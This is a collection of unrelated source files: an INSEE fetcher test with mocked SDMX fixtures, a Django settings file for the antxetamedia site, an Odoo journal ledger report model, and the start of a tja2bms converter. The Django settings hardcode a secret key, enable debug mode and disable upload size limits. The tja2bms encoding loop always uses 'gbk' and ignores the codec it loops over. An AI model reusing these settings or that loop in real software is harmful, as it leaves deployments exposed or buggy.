"codelist_keys": ['base-per', 'decimals', 'embargo-time', 'freq', 'idbank', 'last-update', 'nature', 'obs-status', 'produit', 'ref-area', 'time-per-collect', 'title', 'unit-measure', 'unit-mult'],
"codelist_count": {
"base-per": 0,
"decimals": 0,
"embargo-time": 0,
"freq": 7,
"idbank": 0,
"last-update": 0,
"nature": 25,
"obs-status": 10,
"produit": 30,
"ref-area": 11,
"time-per-collect": 7,
"title": 0,
"unit-measure": 123,
"unit-mult": 0,
},
"dimension_keys": ['freq', 'produit', 'nature'],
"dimension_count": {
"freq": 7,
"produit": 30,
"nature": 25,
},
"attribute_keys": ['idbank', 'title', 'last-update', 'unit-measure', 'unit-mult', 'ref-area', 'decimals', 'base-per', 'time-per-collect', 'obs-status', 'embargo-time'],
"attribute_count": {
"idbank": 0,
"title": 0,
"last-update": 0,
"unit-measure": 123,
"unit-mult": 0,
"ref-area": 11,
"decimals": 0,
"base-per": 0,
"time-per-collect": 7,
"obs-status": 10,
"embargo-time": 0,
},
},
}
DSD_INSEE_CHO_AN_AGE = {
"provider": "INSEE",
"filepaths": deepcopy(xml_samples.DATA_INSEE_SPECIFIC["DSD"]["filepaths"]),
"dataset_code": "CHO-AN-AGE",
"dataset_name": "Unemployment according to the ILO standard (annual average) - By gender and age",
"dsd_id": "CHO-AN-AGE",
"dsd_ids": ["CHO-AN-AGE"],
"dataflow_keys": ['CHO-AN-AGE'],
"is_completed": True,
"concept_keys": ['age', 'base-per', 'decimals', 'embargo-time', 'freq', 'idbank', 'indicateur', 'last-update', 'obs-status', 'ref-area', 'sexe', 'time-per-collect', 'title', 'unit-measure', 'unit-mult'],
"codelist_keys": ['age', 'base-per', 'decimals', 'embargo-time', 'freq', 'idbank', 'indicateur', 'last-update', 'obs-status', 'ref-area', 'sexe', 'time-per-collect', 'title', 'unit-measure', 'unit-mult'],
"codelist_count": {
"age": 73,
"base-per": 0,
"decimals": 0,
"embargo-time": 0,
"freq": 7,
"idbank": 0,
"indicateur": 9,
"last-update": 0,
"obs-status": 10,
"ref-area": 11,
"sexe": 3,
"time-per-collect": 7,
"title": 0,
"unit-measure": 123,
"unit-mult": 0,
},
"dimension_keys": ['indicateur', 'sexe', 'age'],
"dimension_count": {
"indicateur": 9,
"sexe": 3,
"age": 73,
},
"attribute_keys": ['freq', 'idbank', 'title', 'last-update', 'unit-measure', 'unit-mult', 'ref-area', 'decimals', 'base-per', 'time-per-collect', 'obs-status', 'embargo-time'],
"attribute_count": {
"freq": 7,
"idbank": 0,
"title": 0,
"last-update": 0,
"unit-measure": 123,
"unit-mult": 0,
"ref-area": 11,
"decimals": 0,
"base-per": 0,
"time-per-collect": 7,
"obs-status": 10,
"embargo-time": 0,
},
}
DSD_INSEE_CHO_AN_AGE["filepaths"]["datastructure"] = os.path.abspath(os.path.join(RESOURCES_DIR, "insee-datastructure-CHO-AN-AGE.xml"))
DATA_INSEE_CHO_AN_AGE = {
"filepath": os.path.abspath(os.path.join(RESOURCES_DIR, "insee-data-CHO-AN-AGE.xml")),
"klass": "XMLSpecificData_2_1_INSEE",
"DSD": DSD_INSEE_CHO_AN_AGE,
"kwargs": {
"provider_name": "INSEE",
"dataset_code": "CHO-AN-AGE",
"dsd_filepath": DSD_INSEE_CHO_AN_AGE["filepaths"]["datastructure"],
},
"series_accept": 31,
"series_reject_frequency": 0,
"series_reject_empty": 0,
"series_all_values": 1219,
"series_key_first": '001664976',
"series_key_last": '001665006',
"series_sample": {
"provider_name": "INSEE",
"dataset_code": "CHO-AN-AGE",
'key': '001664976',
'name': 'Number - Men - From 15 to 24 years old',
'frequency': 'A',
'last_update': None,
'first_value': {
'value': '143',
'period': '1975',
'attributes': {
"OBS_STATUS": "A"
},
},
'last_value': {
'value': '359',
'period': '2014',
'attributes': {
"OBS_STATUS": "A"
},
},
'dimensions': {
'INDICATEUR': 'Nbre',
'SEXE': '1',
'AGE': '15-24',
},
'attributes': {
'DECIMALS': '0',
'FREQ': 'A',
'LAST_UPDATE': '2016-02-10',
'REF_AREA': 'FM',
'TIME_PER_COLLECT': 'MOYENNE',
'TITLE': 'Nombre de chômeurs au sens du BIT (moyenne annuelle) - Hommes de 15 à 24 ans - France métropolitaine',
'UNIT_MEASURE': 'IND',
'UNIT_MULT': '3'
},
}
}
class FetcherTestCase(BaseFetcherTestCase):
# nosetests -s -v dlstats.tests.fetchers.test_insee:FetcherTestCase
FETCHER_KLASS = Fetcher
DATASETS = {
'IPI-2010-A21': deepcopy(xml_samples.DATA_INSEE_SPECIFIC),
'CHO-AN-AGE': DATA_INSEE_CHO_AN_AGE
}
DATASET_FIRST = "ACT-TRIM-ANC"
DATASET_LAST = "TXEMP-AN-FR"
DEBUG_MODE = False
def _load_files(self, dataset_code, data_key=None):
filepaths = self.DATASETS[dataset_code]["DSD"]["filepaths"]
dsd_content_type = 'application/vnd.sdmx.structure+xml;version=2.1'
url = "http://www.bdm.insee.fr/series/sdmx/dataflow/INSEE"
self.register_url(url,
filepaths["dataflow"],
content_type=dsd_content_type,
match_querystring=True)
url = "http://www.bdm.insee.fr/series/sdmx/categoryscheme/INSEE"
self.register_url(url,
filepaths["categoryscheme"],
content_type=dsd_content_type,
match_querystring=True)
url = "http://www.bdm.insee.fr/series/sdmx/categorisation/INSEE"
self.register_url(url,
filepaths["categorisation"],
content_type=dsd_content_type,
match_querystring=True)
url = "http://www.bdm.insee.fr/series/sdmx/conceptscheme/INSEE"
self.register_url(url,
filepaths["conceptscheme"],
content_type=dsd_content_type,
match_querystring=True)
for cl in ["CL_UNIT", "CL_AREA", "CL_TIME_COLLECT", "CL_OBS_STATUS", "CL_UNIT_MULT", "CL_FREQ"]:
url = "http://www.bdm.insee.fr/series/sdmx/codelist/INSEE/%s" % cl
self.register_url(url,
filepaths[cl],
content_type=dsd_content_type,
match_querystring=True)
url = "http://www.bdm.insee.fr/series/sdmx/datastructure/INSEE/%s?reference=children" % dataset_code
self.register_url(url,
filepaths["datastructure"],
content_type=dsd_content_type,
match_querystring=True)
if data_key:
url = "http://www.bdm.insee.fr/series/sdmx/data/%s/%s" % (dataset_code, data_key)
self.register_url(url,
self.DATASETS[dataset_code]['filepath'],
content_type='application/vnd.sdmx.structurespecificdata+xml;version=2.1',
match_querystring=True)
@httpretty.activate
@unittest.skipUnless('FULL_TEST' in os.environ, "Skip - no full test")
def test_load_datasets_first(self):
dataset_code = 'IPI-2010-A21'
self._load_files(dataset_code)
self.assertLoadDatasetsFirst([dataset_code])
@httpretty.activate
@unittest.skipUnless('FULL_TEST' in os.environ, "Skip - no full test")
def test_load_datasets_update(self):
dataset_code = 'IPI-2010-A21'
self._load_files(dataset_code)
self.assertLoadDatasetsUpdate([dataset_code])
@httpretty.activate
def test_build_data_tree(self):
# nosetests -s -v dlstats.tests.fetchers.test_insee:FetcherTestCase.test_build_data_tree
dataset_code = 'IPI-2010-A21'
self._load_files(dataset_code)
self.DATASETS[dataset_code]["DSD"].update(LOCAL_DATASETS_UPDATE[dataset_code])
self.assertDataTree(dataset_code)
@httpretty.activate
@mock.patch('dlstats.fetchers.insee.INSEE_Data._get_dimensions_from_dsd', get_dimensions_from_dsd)
def test_upsert_dataset_ipi_2010_a21(self):
# nosetests -s -v dlstats.tests.fetchers.test_insee:FetcherTestCase.test_upsert_dataset_ipi_2010_a21
dataset_code = 'IPI-2010-A21'
self.DATASETS[dataset_code]["DSD"].update(LOCAL_DATASETS_UPDATE[dataset_code])
self.DATASETS[dataset_code]["series_sample"]["attributes"].pop("IDBANK", None)
self._load_files(dataset_code, data_key="M..")
self.assertProvider()
dataset = self.assertDataset(dataset_code)
series_list = self.assertSeries(dataset_code)
self.assertTrue(dataset["last_update"] >= datetime(2016, 1, 8))
self.assertEquals(series_list[0]["last_update_ds"], datetime(2016, 1, 8))
self.assertEquals(series_list[-1]["last_update_ds"], datetime(2013, 3, 11))
@httpretty.activate
@mock.patch('dlstats.fetchers.insee.INSEE_Data._get_dimensions_from_dsd', get_dimensions_from_dsd_CHO_AN_AGE)
def test_upsert_dataset_cho_an_age(self):
# nosetests -s -v dlstats.tests.fetchers.test_insee:FetcherTestCase.test_upsert_dataset_cho_an_age
dataset_code = 'CHO-AN-AGE'
self._load_files(dataset_code, data_key="Nbre..")
self.assertProvider()
dataset = self.assertDataset(dataset_code)
series_list = self.assertSeries(dataset_code)
self.assertTrue(dataset["last_update"] >= datetime(2016, 2, 10))
self.assertEquals(series_list[0]["last_update_ds"], datetime(2016, 2, 10))
self.assertEquals(series_list[-1]["last_update_ds"], datetime(2016, 2, 12))
@httpretty.activate
@unittest.skipIf(True, "TODO")
def test_is_updated(self):
# nosetests -s -v dlstats.tests.fetchers.test_insee:FetcherTestCase.test_is_updated
"""
use dataset.series.now
"""
dataset_code = 'IPI-2010-A21'
self._load_files(dataset_code)
self.insee.upsert_dataset(dataset_code)
'''series avec un LAST_UPDATE > au dataset'''
query = {
'provider_name': self.insee.provider_name,
"dataset_code": dataset_code
}
new_datetime = datetime(2015, 12, 9)
result = self.db[constants.COL_DATASETS].update_one(query, {"$set": {'last_update': new_datetime}})
pprint(result.raw_result)
self._load_files(dataset_code)
self.insee.upsert_dataset(dataset_code)
_series = self.insee.insee_data._series
#pprint(_series)
for s in _series:
print(s['key'])
d = self.db[constants.COL_DATASETS].find_one(query)
print("dataset : ", d['last_update'])
self.assertEqual(len(_series), 11)
|
GISAElkartea/amv2
|
antxetamedia/settings.py
|
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'd2w#o#(!antcw5e%(#p5*pu(x=zhw60^byh$)ps+4#e8m#-fj!'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
INSTALLED_APPS = [
'django.contrib.sites',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'grappelli.dashboard',
'grappelli',
'django.contrib.admin',
'adminsortable2',
'ckeditor',
'ckeditor_uploader',
'compressor',
'recurrence',
'kombu.transport.django',
'watson',
'sorl.thumbnail',
'django_filters',
'antxetamedia',
'antxetamedia.frontpage',
'antxetamedia.blobs.apps.BlobsConfig',
'antxetamedia.shows',
'antxetamedia.news.apps.NewsConfig',
'antxetamedia.radio.apps.RadioConfig',
'antxetamedia.projects.apps.ProjectsConfig',
'antxetamedia.schedule',
'antxetamedia.widgets',
'antxetamedia.events.apps.EventsConfig',
'antxetamedia.flatpages',
'antxetamedia.archive',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
SITE_ID = 3
ROOT_URLCONF = 'antxetamedia.urls'
TEMPLATES = [
{
'NAME': 'Only project',
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join('antxetamedia/templates')],
'APP_DIRS': True,
'OPTIONS': {
'debug': DEBUG,
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'antxetamedia.flatpages.context_processors.menu_flatpage_list',
],
},
},
]
WSGI_APPLICATION = 'antxetamedia.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'eu'
LANGUAGES = [('eu', 'Euskara')]
TIME_ZONE = 'Europe/Paris'
USE_I18N = True
USE_L10N = True
USE_TZ = True
LOCALE_PATHS = [os.path.join(BASE_DIR, 'antxetamedia/locale')]
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
MEDIA_ROOT = os.path.join(BASE_DIR, '.media')
MEDIA_URL = '/media/'
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, '.assets')
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'antxetamedia/static')]
STATICFILES_FINDERS = [
'compressor.finders.CompressorFinder',
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
]
BROKER_URL = 'django://'
CELERY_ALWAYS_EAGER = True
CELERY_TASK_SERIALIZER = 'json'
CELERY_ACCEPT_CONTENT = ['json']
COMPRESS_PRECOMPILERS = [('text/x-sass', 'django_libsass.SassCompiler')]
CKEDITOR_JQUERY_URL = os.path.join(STATIC_URL, 'bower_components/jquery/dist/jquery.min.js')
CKEDITOR_UPLOAD_PATH = 'ckeditor/'
CKEDITOR_IMAGE_BACKEND = 'pillow'
CKEDITOR_CONFIGS = {
'default': {
'extraPlugins': 'iframe,autoembed',
'toolbar': [
['Format', 'Bold', 'Italic', 'Underline', 'StrikeThrough', '-',
'NumberedList', 'BulletedList', '-', 'Outdent', 'Indent', '-', 'JustifyLeft', 'JustifyCenter',
'JustifyRight', 'JustifyBlock'],
['Image', 'Link', 'Iframe', 'Source'],
['Undo', 'Redo', '-', 'Cut', 'Copy', 'Paste', 'Find', 'Replace', '-', 'Print'],
],
}
}
GRAPPELLI_INDEX_DASHBOARD = 'antxetamedia.dashboard.AntxetamediaDashboard'
GRAPPELLI_ADMIN_TITLE = 'Antxetamedia'
GRAPPELLI_SWITCH_USER = True
GRAPPELLI_CLEAN_INPUT_TYPES = False
FORMAT_MODULE_PATH = 'antxetamedia.formats'
DATA_UPLOAD_MAX_MEMORY_SIZE = None # Disable upload size limits
FRONTPAGE_NEWSPODCASTS = 5
FRONTPAGE_RADIOPODCASTS = 10
FRONTPAGE_EVENTS = 5
NEWSCATEGORIES_COOKIE = 'newscategories'
RADIOSHOWS_COOKIE = 'radioshows'
SYNC_BLOBS = False
|
BT-astauder/account-financial-reporting
|
account_financial_report/report/journal_ledger.py
|
# Copyright 2017 ACSONE SA/NV
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import models, fields, api
DIGITS = (16, 2)
class ReportJournalLedger(models.TransientModel):
_name = 'report_journal_ledger'
date_from = fields.Date(
required=True
)
date_to = fields.Date(
required=True
)
company_id = fields.Many2one(
comodel_name='res.company',
required=True,
ondelete='cascade'
)
move_target = fields.Selection(
selection='_get_move_targets',
default='all',
required=True,
)
sort_option = fields.Selection(
selection='_get_sort_options',
default='move_name',
required=True,
)
group_option = fields.Selection(
selection='_get_group_options',
default='journal',
required=True,
)
journal_ids = fields.Many2many(
comodel_name='account.journal',
required=True,
)
report_journal_ledger_ids = fields.One2many(
comodel_name='report_journal_ledger_journal',
inverse_name='report_id',
)
report_move_ids = fields.One2many(
comodel_name='report_journal_ledger_move',
inverse_name='report_id',
)
report_move_line_ids = fields.One2many(
comodel_name='report_journal_ledger_move_line',
inverse_name='report_id',
)
report_journal_ledger_tax_line_ids = fields.One2many(
comodel_name='report_journal_ledger_journal_tax_line',
inverse_name='report_id',
)
report_tax_line_ids = fields.One2many(
comodel_name='report_journal_ledger_report_tax_line',
inverse_name='report_id',
)
foreign_currency = fields.Boolean()
with_account_name = fields.Boolean()
@api.model
def _get_move_targets(self):
return self.env['journal.ledger.report.wizard']._get_move_targets()
@api.model
def _get_sort_options(self):
return self.env['journal.ledger.report.wizard']._get_sort_options()
@api.model
def _get_group_options(self):
return self.env['journal.ledger.report.wizard']._get_group_options()
@api.multi
def compute_data_for_report(self):
self.ensure_one()
self._inject_journal_values()
self._inject_move_values()
self._inject_move_line_values()
self._inject_journal_tax_values()
self._update_journal_report_total_values()
if self.group_option == 'none':
self._inject_report_tax_values()
# Refresh cache because all data are computed with SQL requests
self.invalidate_cache()
@api.multi
def _inject_journal_values(self):
self.ensure_one()
sql = """
DELETE
FROM report_journal_ledger_journal
WHERE report_id = %s
"""
params = (
self.id,
)
self.env.cr.execute(sql, params)
sql = """
INSERT INTO report_journal_ledger_journal (
create_uid,
create_date,
report_id,
journal_id,
name,
code,
company_id,
currency_id
)
SELECT
%s as create_uid,
NOW() as create_date,
%s as report_id,
aj.id as journal_id,
aj.name as name,
aj.code as code,
aj.company_id as company_id,
COALESCE(aj.currency_id, company.currency_id) as currency_id
FROM
account_journal aj
LEFT JOIN
res_company company on (company.id = aj.company_id)
WHERE
aj.id in %s
AND
aj.company_id = %s
ORDER BY
aj.name
"""
params = (
self.env.uid,
self.id,
tuple(self.journal_ids.ids),
self.company_id.id,
)
self.env.cr.execute(sql, params)
@api.multi
def _inject_move_values(self):
self.ensure_one()
sql = """
DELETE
FROM report_journal_ledger_move
WHERE report_id = %s
"""
params = (
self.id,
)
self.env.cr.execute(sql, params)
sql = self._get_inject_move_insert()
sql += self._get_inject_move_select()
sql += self._get_inject_move_where_clause()
sql += self._get_inject_move_order_by()
params = self._get_inject_move_params()
self.env.cr.execute(sql, params)
@api.multi
def _get_inject_move_insert(self):
return """
INSERT INTO report_journal_ledger_move (
create_uid,
create_date,
report_id,
report_journal_ledger_id,
move_id,
name,
company_id
)
"""
@api.multi
def _get_inject_move_select(self):
return """
SELECT
%s as create_uid,
NOW() as create_date,
rjqj.report_id as report_id,
rjqj.id as report_journal_ledger_id,
am.id as move_id,
am.name as name,
am.company_id as company_id
FROM
account_move am
INNER JOIN
report_journal_ledger_journal rjqj
on (rjqj.journal_id = am.journal_id)
"""
@api.multi
def _get_inject_move_where_clause(self):
self.ensure_one()
where_clause = """
WHERE
rjqj.report_id = %s
AND
am.date >= %s
AND
am.date <= %s
"""
if self.move_target != 'all':
where_clause += """
AND
am.state = %s
"""
return where_clause
@api.multi
def _get_inject_move_order_by(self):
self.ensure_one()
order_by = """
ORDER BY
"""
if self.sort_option == 'move_name':
order_by += " am.name"
elif self.sort_option == 'date':
order_by += " am.date, am.name"
return order_by
@api.multi
def _get_inject_move_params(self):
params = [
self.env.uid,
self.id,
self.date_from,
self.date_to
]
if self.move_target != 'all':
params.append(self.move_target)
return tuple(params)
@api.multi
def _inject_move_line_values(self):
self.ensure_one()
sql = """
DELETE
FROM report_journal_ledger_move_line
WHERE report_id = %s
"""
params = (
self.id,
)
self.env.cr.execute(sql, params)
sql = """
INSERT INTO report_journal_ledger_move_line (
create_uid,
create_date,
report_id,
report_journal_ledger_id,
report_move_id,
move_line_id,
account_id,
account,
account_code,
account_type,
partner_id,
partner,
date,
entry,
label,
debit,
credit,
company_currency_id,
amount_currency,
currency_id,
currency_name,
tax_id,
taxes_description,
company_id
)
SELECT
%s as create_uid,
NOW() as create_date,
rjqm.report_id as report_id,
rjqm.report_journal_ledger_id as report_journal_ledger_id,
rjqm.id as report_move_id,
aml.id as move_line_id,
aml.account_id as account_id,
aa.name as account,
aa.code as account_code,
aa.internal_type as account_type,
aml.partner_id as partner_id,
p.name as partner,
aml.date as date,
rjqm.name as entry,
aml.name as label,
aml.debit as debit,
aml.credit as credit,
aml.company_currency_id as currency_id,
aml.amount_currency as amount_currency,
aml.currency_id as currency_id,
currency.name as currency_name,
aml.tax_line_id as tax_id,
CASE
WHEN
aml.tax_line_id is not null
THEN
COALESCE(at.description, at.name)
WHEN
aml.tax_line_id is null
THEN
(SELECT
array_to_string(
array_agg(COALESCE(at.description, at.name)
), ', ')
FROM
account_move_line_account_tax_rel aml_at_rel
LEFT JOIN
account_tax at on (at.id = aml_at_rel.account_tax_id)
WHERE
aml_at_rel.account_move_line_id = aml.id)
ELSE
''
END as taxes_description,
aml.company_id as company_id
FROM
account_move_line aml
INNER JOIN
report_journal_ledger_move rjqm
on (rjqm.move_id = aml.move_id)
LEFT JOIN
account_account aa
on (aa.id = aml.account_id)
LEFT JOIN
res_partner p
on (p.id = aml.partner_id)
LEFT JOIN
account_tax at
on (at.id = aml.tax_line_id)
LEFT JOIN
res_currency currency
on (currency.id = aml.currency_id)
WHERE
rjqm.report_id = %s
"""
params = (
self.env.uid,
self.id,
)
self.env.cr.execute(sql, params)
@api.multi
def _inject_report_tax_values(self):
self.ensure_one()
sql_distinct_tax_id = """
SELECT
distinct(jrqjtl.tax_id)
FROM
report_journal_ledger_journal_tax_line jrqjtl
WHERE
jrqjtl.report_id = %s
"""
self.env.cr.execute(sql_distinct_tax_id, (self.id,))
rows = self.env.cr.fetchall()
tax_ids = set([row[0] for row in rows])
sql = """
INSERT INTO report_journal_ledger_report_tax_line (
create_uid,
create_date,
report_id,
tax_id,
tax_name,
tax_code,
base_debit,
base_credit,
tax_debit,
tax_credit
)
SELECT
%s as create_uid,
NOW() as create_date,
%s as report_id,
%s as tax_id,
at.name as tax_name,
at.description as tax_code,
(
SELECT sum(base_debit)
FROM report_journal_ledger_journal_tax_line jrqjtl2
WHERE jrqjtl2.report_id = %s
AND jrqjtl2.tax_id = %s
) as base_debit,
(
SELECT sum(base_credit)
FROM report_journal_ledger_journal_tax_line jrqjtl2
WHERE jrqjtl2.report_id = %s
AND jrqjtl2.tax_id = %s
) as base_credit,
(
SELECT sum(tax_debit)
FROM report_journal_ledger_journal_tax_line jrqjtl2
WHERE jrqjtl2.report_id = %s
AND jrqjtl2.tax_id = %s
) as tax_debit,
(
SELECT sum(tax_credit)
FROM report_journal_ledger_journal_tax_line jrqjtl2
WHERE jrqjtl2.report_id = %s
AND jrqjtl2.tax_id = %s
) as tax_credit
FROM
report_journal_ledger_journal_tax_line jrqjtl
LEFT JOIN
account_tax at
on (at.id = jrqjtl.tax_id)
WHERE
jrqjtl.report_id = %s
AND
jrqjtl.tax_id = %s
"""
for tax_id in tax_ids:
params = (
self.env.uid,
self.id,
tax_id,
self.id,
tax_id,
self.id,
tax_id,
self.id,
tax_id,
self.id,
tax_id,
self.id,
tax_id,
)
self.env.cr.execute(sql, params)
@api.multi
def _inject_journal_tax_values(self):
self.ensure_one()
sql = """
DELETE
FROM report_journal_ledger_journal_tax_line
WHERE report_id = %s
"""
params = (
self.id,
)
self.env.cr.execute(sql, params)
sql_distinct_tax_id = """
SELECT
distinct(jrqml.tax_id)
FROM
report_journal_ledger_move_line jrqml
WHERE
jrqml.report_journal_ledger_id = %s
"""
tax_ids_by_journal_id = {}
for report_journal in self.report_journal_ledger_ids:
if report_journal.id not in tax_ids_by_journal_id:
tax_ids_by_journal_id[report_journal.id] = []
self.env.cr.execute(sql_distinct_tax_id, (report_journal.id,))
rows = self.env.cr.fetchall()
tax_ids_by_journal_id[report_journal.id].extend([
row[0] for row in rows if row[0]
])
sql = """
INSERT INTO report_journal_ledger_journal_tax_line (
create_uid,
create_date,
report_id,
report_journal_ledger_id,
tax_id,
tax_name,
tax_code,
base_debit,
base_credit,
tax_debit,
tax_credit
)
SELECT
%s as create_uid,
NOW() as create_date,
%s as report_id,
%s as report_journal_ledger_id,
%s as tax_id,
at.name as tax_name,
at.description as tax_code,
(
SELECT sum(debit)
FROM report_journal_ledger_move_line jrqml2
WHERE jrqml2.report_journal_ledger_id = %s
AND (
SELECT
count(*)
FROM
account_move_line_account_tax_rel aml_at_rel
WHERE
aml_at_rel.account_move_line_id =
jrqml2.move_line_id
AND
aml_at_rel.account_tax_id = %s
) > 0
) as base_debit,
(
SELECT sum(credit)
FROM report_journal_ledger_move_line jrqml2
WHERE jrqml2.report_journal_ledger_id = %s
AND (
SELECT
count(*)
FROM
account_move_line_account_tax_rel aml_at_rel
WHERE
aml_at_rel.account_move_line_id =
jrqml2.move_line_id
AND
aml_at_rel.account_tax_id = %s
) > 0
) as base_credit,
(
SELECT sum(debit)
FROM report_journal_ledger_move_line jrqml2
WHERE jrqml2.report_journal_ledger_id = %s
AND jrqml2.tax_id = %s
) as tax_debit,
(
SELECT sum(credit)
FROM report_journal_ledger_move_line jrqml2
WHERE jrqml2.report_journal_ledger_id = %s
AND jrqml2.tax_id = %s
) as tax_credit
FROM
report_journal_ledger_journal rjqj
LEFT JOIN
account_tax at
on (at.id = %s)
WHERE
rjqj.id = %s
"""
for report_journal_ledger_id in tax_ids_by_journal_id:
tax_ids = tax_ids_by_journal_id[report_journal_ledger_id]
for tax_id in tax_ids:
params = (
self.env.uid,
self.id,
report_journal_ledger_id,
tax_id,
report_journal_ledger_id,
tax_id,
report_journal_ledger_id,
tax_id,
report_journal_ledger_id,
tax_id,
report_journal_ledger_id,
tax_id,
tax_id,
report_journal_ledger_id,
)
self.env.cr.execute(sql, params)
@api.multi
def _update_journal_report_total_values(self):
self.ensure_one()
sql = """
UPDATE
report_journal_ledger_journal rjqj
SET
debit = (
SELECT sum(rjqml.debit)
FROM report_journal_ledger_move_line rjqml
WHERE rjqml.report_journal_ledger_id = rjqj.id
),
credit = (
SELECT sum(rjqml.credit)
FROM report_journal_ledger_move_line rjqml
WHERE rjqml.report_journal_ledger_id = rjqj.id
)
WHERE
rjqj.report_id = %s
"""
self.env.cr.execute(sql, (self.id,))
@api.multi
def print_report(self, report_type):
self.ensure_one()
if report_type == 'xlsx':
report_name = 'a_f_r.report_journal_ledger_xlsx'
else:
report_name = 'account_financial_report.' \
'report_journal_ledger_qweb'
return self.env['ir.actions.report'].search(
[('report_name', '=', report_name),
('report_type', '=', report_type)], limit=1).report_action(self)
def _get_html(self):
result = {}
rcontext = {}
context = dict(self.env.context)
report = self.browse(context.get('active_id'))
if report:
rcontext['o'] = report
result['html'] = self.env.ref(
'account_financial_report.report_journal_ledger').render(
rcontext)
return result
@api.model
def get_html(self, given_context=None):
return self._get_html()
class ReportJournalLedgerJournal(models.TransientModel):
_name = 'report_journal_ledger_journal'
name = fields.Char(
required=True,
)
code = fields.Char()
report_id = fields.Many2one(
comodel_name='report_journal_ledger',
required=True,
ondelete='cascade'
)
journal_id = fields.Many2one(
comodel_name='account.journal',
required=True,
ondelete='cascade',
)
report_move_ids = fields.One2many(
comodel_name='report_journal_ledger_move',
inverse_name='report_journal_ledger_id',
)
report_tax_line_ids = fields.One2many(
comodel_name='report_journal_ledger_journal_tax_line',
inverse_name='report_journal_ledger_id',
)
debit = fields.Float(
digits=DIGITS,
)
credit = fields.Float(
digits=DIGITS,
)
company_id = fields.Many2one(
comodel_name='res.company',
required=True,
ondelete='cascade'
)
currency_id = fields.Many2one(
comodel_name='res.currency',
)
class ReportJournalLedgerMove(models.TransientModel):
_name = 'report_journal_ledger_move'
report_id = fields.Many2one(
comodel_name='report_journal_ledger',
required=True,
ondelete='cascade'
)
report_journal_ledger_id = fields.Many2one(
comodel_name='report_journal_ledger_journal',
required=True,
ondelete='cascade',
)
move_id = fields.Many2one(
comodel_name='account.move',
required=True,
ondelete='cascade',
)
report_move_line_ids = fields.One2many(
comodel_name='report_journal_ledger_move_line',
inverse_name='report_move_id',
)
name = fields.Char()
company_id = fields.Many2one(
comodel_name='res.company',
required=True,
ondelete='cascade'
)
class ReportJournalLedgerMoveLine(models.TransientModel):
_name = 'report_journal_ledger_move_line'
_order = 'partner_id desc, account_id desc'
report_id = fields.Many2one(
comodel_name='report_journal_ledger',
required=True,
ondelete='cascade'
)
report_journal_ledger_id = fields.Many2one(
comodel_name='report_journal_ledger_journal',
required=True,
ondelete='cascade',
)
report_move_id = fields.Many2one(
comodel_name='report_journal_ledger_move',
required=True,
ondelete='cascade',
)
move_line_id = fields.Many2one(
comodel_name='account.move.line',
required=True,
ondelete='cascade',
)
account_id = fields.Many2one(
comodel_name='account.account'
)
account = fields.Char()
account_code = fields.Char()
account_type = fields.Char()
partner = fields.Char()
partner_id = fields.Many2one(
comodel_name='res.partner',
)
date = fields.Date()
entry = fields.Char()
label = fields.Char()
debit = fields.Float(
digits=DIGITS,
)
credit = fields.Float(
digits=DIGITS,
)
company_currency_id = fields.Many2one(
comodel_name='res.currency',
)
amount_currency = fields.Monetary(
currency_field='currency_id',
)
currency_id = fields.Many2one(
comodel_name='res.currency',
)
currency_name = fields.Char()
taxes_description = fields.Char()
tax_id = fields.Many2one(
comodel_name='account.tax'
)
company_id = fields.Many2one(
comodel_name='res.company',
required=True,
ondelete='cascade'
)
class ReportJournalLedgerReportTaxLine(models.TransientModel):
_name = 'report_journal_ledger_report_tax_line'
_order = 'tax_code'
report_id = fields.Many2one(
comodel_name='report_journal_ledger',
required=True,
ondelete='cascade'
)
tax_id = fields.Many2one(
comodel_name='account.tax'
)
tax_name = fields.Char()
tax_code = fields.Char()
base_debit = fields.Float(
digits=DIGITS,
)
base_credit = fields.Float(
digits=DIGITS,
)
base_balance = fields.Float(
digits=DIGITS,
compute='_compute_base_balance',
)
tax_debit = fields.Float(
digits=DIGITS,
)
tax_credit = fields.Float(
digits=DIGITS,
)
tax_balance = fields.Float(
digits=DIGITS,
compute='_compute_tax_balance'
)
@api.multi
def _compute_base_balance(self):
for rec in self:
rec.base_balance = rec.base_debit - rec.base_credit
@api.multi
def _compute_tax_balance(self):
for rec in self:
rec.tax_balance = rec.tax_debit - rec.tax_credit
class ReportJournalLedgerJournalTaxLine(models.TransientModel):
_name = 'report_journal_ledger_journal_tax_line'
_inherit = 'report_journal_ledger_report_tax_line'
_order = 'tax_code'
report_journal_ledger_id = fields.Many2one(
comodel_name='report_journal_ledger_journal',
required=True,
ondelete='cascade',
)
|
Saren-Arterius/textage2bms
|
tja2bms.py
|
#!/usr/bin/env python3
from tja_info import *
from sys import argv, stderr
if __name__ == '__main__':
info = None
parse_level = 3
try:
parse_level = TJAInfo.parse_course(argv[2])
except:
pass
for codec in ['utf-8', 'shift-jis', 'gbk']:
try:
with open(argv[1], encoding='gbk') as d:
info = TJAInfo(d.read())
break
except:
pass
